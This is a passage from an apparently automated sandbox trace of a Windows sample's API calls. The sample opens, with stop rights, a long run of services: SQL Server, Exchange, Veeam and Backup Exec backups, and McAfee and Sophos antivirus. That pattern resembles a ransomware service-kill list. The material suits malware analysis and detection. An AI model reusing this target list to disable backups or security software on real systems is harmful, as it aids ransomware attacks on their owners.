0x1150684 [0059.703] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.703] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSExchangeThrottling", dwDesiredAccess=0x2c) returned 0x0 [0059.703] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.710] GetTickCount () returned 0x1150694 [0059.710] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.711] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSExchangeTransport", dwDesiredAccess=0x2c) returned 0x0 [0059.711] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.711] GetTickCount () returned 0x1150694 [0059.711] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.711] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSExchangeTransportLogSearch", dwDesiredAccess=0x2c) returned 0x0 [0059.712] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.712] GetTickCount () returned 0x1150694 [0059.712] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.712] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MSOLAP$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0059.712] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.713] GetTickCount () returned 0x1150694 [0059.713] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.713] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSOLAP$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0059.713] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.713] GetTickCount () returned 0x1150694 [0059.713] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.714] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSOLAP$TPS", dwDesiredAccess=0x2c) returned 0x0 [0059.714] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.714] GetTickCount () returned 0x1150694 [0059.714] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.715] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSOLAP$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0059.715] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.715] GetTickCount () returned 0x1150694 [0059.715] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.715] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSSQL$BKUPEXEC", dwDesiredAccess=0x2c) returned 0x0 [0059.716] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.716] GetTickCount () returned 0x1150694 [0059.716] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.716] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSSQL$ECWDB2", dwDesiredAccess=0x2c) returned 0x0 [0059.716] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.716] GetTickCount () returned 0x1150694 [0059.716] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.717] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSSQL$PRACTICEMGT", dwDesiredAccess=0x2c) returned 0x0 [0059.717] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.717] GetTickCount () returned 0x1150694 [0059.717] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.718] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSSQL$PRACTTICEBGC", dwDesiredAccess=0x2c) returned 0x0 [0059.718] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.718] GetTickCount () returned 0x1150694 [0059.718] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.718] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSSQL$PROD", dwDesiredAccess=0x2c) returned 0x0 [0059.718] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.719] GetTickCount () returned 0x1150694 [0059.719] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.719] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSSQL$PROFXENGAGEMENT", dwDesiredAccess=0x2c) returned 0x0 [0059.719] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.719] GetTickCount () returned 0x11506a3 [0059.719] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.720] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSSQL$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0059.720] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.721] GetTickCount () returned 0x11506a3 [0059.721] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.721] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSSQL$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0059.721] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.721] GetTickCount () returned 0x11506a3 [0059.721] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.722] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSSQL$SOPHOS", dwDesiredAccess=0x2c) returned 0x0 [0059.722] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.722] GetTickCount () returned 0x11506a3 [0059.722] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.722] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MSSQL$SQLEXPRESS", dwDesiredAccess=0x2c) returned 0x0 [0059.723] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.723] GetTickCount () returned 0x11506a3 [0059.723] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.723] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSSQL$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0059.723] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.724] GetTickCount () returned 0x11506a3 [0059.724] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.724] OpenServiceW (hSCManager=0xe4d178, lpServiceName="MSSQL$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0059.724] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.724] GetTickCount () returned 0x11506a3 [0059.724] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.725] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSSQL$TPS", dwDesiredAccess=0x2c) returned 0x0 [0059.725] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.725] GetTickCount () returned 0x11506a3 [0059.725] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.725] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MSSQL$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0059.726] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.726] GetTickCount () returned 0x11506a3 [0059.726] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.726] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSSQL$VEEAMSQL2008R2", dwDesiredAccess=0x2c) returned 0x0 [0059.726] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.727] GetTickCount () returned 0x11506a3 [0059.727] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.727] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MSSQL$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0059.727] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.727] GetTickCount () returned 0x11506a3 [0059.727] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.728] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSSQLFDLauncher", dwDesiredAccess=0x2c) returned 0x0 [0059.728] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.728] GetTickCount () returned 0x11506a3 [0059.728] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.728] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSSQLFDLauncher$PROFXENGAGEMENT", dwDesiredAccess=0x2c) returned 0x0 [0059.729] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.729] GetTickCount () returned 0x11506a3 [0059.729] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.729] OpenServiceW (hSCManager=0xe4d178, lpServiceName="MSSQLFDLauncher$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0059.729] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.729] GetTickCount () returned 0x11506a3 [0059.729] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.730] OpenServiceW (hSCManager=0xe4d330, lpServiceName="MSSQLFDLauncher$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0059.730] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.730] GetTickCount () returned 0x11506a3 [0059.730] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.731] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSSQLFDLauncher$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0059.731] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.731] GetTickCount () returned 0x11506a3 [0059.731] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.731] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSSQLFDLauncher$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0059.731] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.732] GetTickCount () returned 0x11506a3 [0059.732] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.732] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSSQLFDLauncher$TPS", dwDesiredAccess=0x2c) returned 0x0 [0059.732] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.732] GetTickCount () returned 0x11506a3 [0059.732] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.733] OpenServiceW (hSCManager=0xe4d178, lpServiceName="MSSQLFDLauncher$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0059.734] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.734] GetTickCount () returned 0x11506a3 [0059.734] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.734] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSSQLSERVER", dwDesiredAccess=0x2c) returned 0x0 [0059.746] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.747] GetTickCount () returned 0x11506b3 [0059.747] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.747] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSSQLServerADHelper", dwDesiredAccess=0x2c) returned 0x0 [0059.747] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.748] GetTickCount () returned 0x11506b3 [0059.748] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.748] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSSQLServerADHelper100", dwDesiredAccess=0x2c) returned 0x0 [0059.748] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.748] GetTickCount () returned 0x11506b3 [0059.748] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.749] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSSQLServerOLAPService", dwDesiredAccess=0x2c) returned 0x0 [0059.749] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.749] GetTickCount () returned 0x11506b3 [0059.749] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.749] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="McAfeeEngineService", dwDesiredAccess=0x2c) returned 0x0 [0059.750] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.750] GetTickCount () returned 0x11506b3 [0059.750] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.750] OpenServiceW (hSCManager=0xe4d330, lpServiceName="McAfeeFramework", dwDesiredAccess=0x2c) returned 0x0 [0059.751] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.751] GetTickCount () returned 0x11506c3 [0059.751] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.752] OpenServiceW (hSCManager=0xe4d060, lpServiceName="McAfeeFrameworkMcAfeeFramework", dwDesiredAccess=0x2c) returned 0x0 [0059.752] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.752] GetTickCount () returned 0x11506c3 [0059.752] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.753] OpenServiceW (hSCManager=0xe4d150, lpServiceName="McShield", dwDesiredAccess=0x2c) returned 0x0 [0059.753] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.753] GetTickCount () returned 0x11506c3 [0059.753] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.753] OpenServiceW (hSCManager=0xe4d240, lpServiceName="McTaskManager", dwDesiredAccess=0x2c) returned 0x0 [0059.754] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.754] GetTickCount () returned 0x11506c3 [0059.754] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.754] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MongoDB", dwDesiredAccess=0x2c) returned 0x0 [0059.754] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.754] GetTickCount () returned 0x11506c3 [0059.755] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.755] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MsDtsServer", dwDesiredAccess=0x2c) returned 0x0 [0059.755] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.755] GetTickCount () returned 0x11506c3 [0059.755] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.756] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MsDtsServer100", dwDesiredAccess=0x2c) returned 0x0 [0059.756] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.756] GetTickCount () returned 0x11506c3 [0059.756] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.756] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MsDtsServer110", dwDesiredAccess=0x2c) returned 0x0 [0059.757] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.757] GetTickCount () returned 0x11506c3 [0059.757] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.757] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MySQL57", dwDesiredAccess=0x2c) returned 0x0 [0059.757] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.757] GetTickCount () returned 0x11506c3 [0059.758] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.758] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MySQL80", dwDesiredAccess=0x2c) returned 0x0 [0059.758] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.758] GetTickCount () returned 0x11506c3 [0059.758] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.760] OpenServiceW (hSCManager=0xe4d330, lpServiceName="nginx", dwDesiredAccess=0x2c) returned 0x0 [0059.760] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.760] GetTickCount () returned 0x11506c3 [0059.760] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.761] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="NetMsmqActivator", dwDesiredAccess=0x2c) returned 0x0 [0059.761] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.761] GetTickCount () returned 0x11506c3 [0059.761] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.762] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="OracleClientCache80", dwDesiredAccess=0x2c) returned 0x0 [0059.762] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.762] GetTickCount () returned 0x11506c3 [0059.762] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.762] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="OracleServiceXE", dwDesiredAccess=0x2c) returned 0x0 [0059.763] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.763] GetTickCount () returned 0x11506c3 [0059.763] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.763] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="OracleXETNSListener", dwDesiredAccess=0x2c) returned 0x0 [0059.763] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.763] GetTickCount () returned 0x11506c3 [0059.763] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.764] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="PDVFSService", dwDesiredAccess=0x2c) returned 0x0 [0059.764] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.764] GetTickCount () returned 0x11506c3 [0059.764] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.765] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="POP3Svc", dwDesiredAccess=0x2c) returned 0x0 [0059.765] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.765] GetTickCount () returned 0x11506c3 [0059.765] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.765] OpenServiceW (hSCManager=0xe4d150, lpServiceName="RESvc", dwDesiredAccess=0x2c) returned 0x0 [0059.766] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.766] GetTickCount () returned 0x11506d2 [0059.766] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.767] OpenServiceW (hSCManager=0xe4d150, lpServiceName="ReportServer", dwDesiredAccess=0x2c) returned 0x0 [0059.767] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.767] GetTickCount () returned 0x11506d2 [0059.767] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.768] OpenServiceW (hSCManager=0xe4d150, lpServiceName="ReportServer$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0059.768] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.768] GetTickCount () returned 0x11506d2 [0059.768] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.768] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="ReportServer$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0059.769] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.769] GetTickCount () returned 0x11506d2 [0059.769] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.769] OpenServiceW (hSCManager=0xe4d178, lpServiceName="ReportServer$TPS", dwDesiredAccess=0x2c) returned 0x0 [0059.769] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.769] GetTickCount () returned 0x11506d2 [0059.770] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.770] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="ReportServer$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0059.770] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.770] GetTickCount () returned 0x11506d2 [0059.770] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.771] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="SAVAdminService", dwDesiredAccess=0x2c) returned 0x0 [0059.771] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.771] GetTickCount () returned 0x11506d2 [0059.771] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.771] OpenServiceW (hSCManager=0xe4d178, lpServiceName="SAVService", dwDesiredAccess=0x2c) returned 0x0 [0059.772] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.772] GetTickCount () returned 0x11506d2 [0059.772] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.772] OpenServiceW (hSCManager=0xe4d060, lpServiceName="SDRSVC", dwDesiredAccess=0x2c) returned 0xe4d240 [0059.773] QueryServiceStatusEx (in: hService=0xe4d240, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0059.774] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.775] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.775] GetTickCount () returned 0x11506d2 [0059.775] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.775] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SMTPSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.775] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.776] GetTickCount () returned 0x11506d2 [0059.776] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.776] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SNAC", dwDesiredAccess=0x2c) returned 0x0 [0059.776] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.776] GetTickCount () returned 0x11506d2 [0059.776] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.777] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SQL Backups", dwDesiredAccess=0x2c) returned 0x0 [0059.777] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.777] GetTickCount () returned 0x11506d2 [0059.777] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.778] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SQLAgent$BKUPEXEC", dwDesiredAccess=0x2c) returned 0x0 [0059.778] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.778] GetTickCount () returned 0x11506d2 [0059.778] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.778] OpenServiceW (hSCManager=0xe4d150, lpServiceName="SQLAgent$CITRIX_METAFRAME", dwDesiredAccess=0x2c) returned 0x0 [0059.778] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.779] GetTickCount () returned 0x11506d2 [0059.779] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.779] OpenServiceW (hSCManager=0xe4d150, lpServiceName="SQLAgent$CXDB", dwDesiredAccess=0x2c) returned 0x0 [0059.779] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.779] GetTickCount () returned 0x11506d2 [0059.779] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.780] OpenServiceW (hSCManager=0xe4d150, lpServiceName="SQLAgent$ECWDB2", dwDesiredAccess=0x2c) returned 0x0 [0059.780] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.780] GetTickCount () returned 0x11506d2 [0059.780] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.781] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SQLAgent$PRACTTICEBGC", dwDesiredAccess=0x2c) returned 0x0 [0059.781] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.781] GetTickCount () returned 0x11506d2 [0059.781] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.781] OpenServiceW (hSCManager=0xe4d178, lpServiceName="SQLAgent$PRACTTICEMGT", dwDesiredAccess=0x2c) returned 0x0 [0059.781] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.785] GetTickCount () returned 0x11506e2 [0059.785] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.785] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="SQLAgent$PROD", dwDesiredAccess=0x2c) returned 0x0 [0059.785] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.786] GetTickCount () returned 0x11506e2 [0059.786] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.786] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="SQLAgent$PROFXENGAGEMENT", dwDesiredAccess=0x2c) returned 0x0 [0059.786] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.786] GetTickCount () returned 0x11506e2 [0059.786] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.787] OpenServiceW (hSCManager=0xe4d178, lpServiceName="SQLAgent$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0059.787] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.787] GetTickCount () returned 0x11506e2 [0059.787] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.788] OpenServiceW (hSCManager=0xe4d060, lpServiceName="SQLAgent$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0059.788] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.788] GetTickCount () returned 0x11506e2 [0059.788] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.788] OpenServiceW (hSCManager=0xe4d060, lpServiceName="SQLAgent$SOPHOS", dwDesiredAccess=0x2c) returned 0x0 [0059.788] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.789] GetTickCount () returned 0x11506e2 [0059.789] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.789] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SQLAgent$SQLEXPRESS", 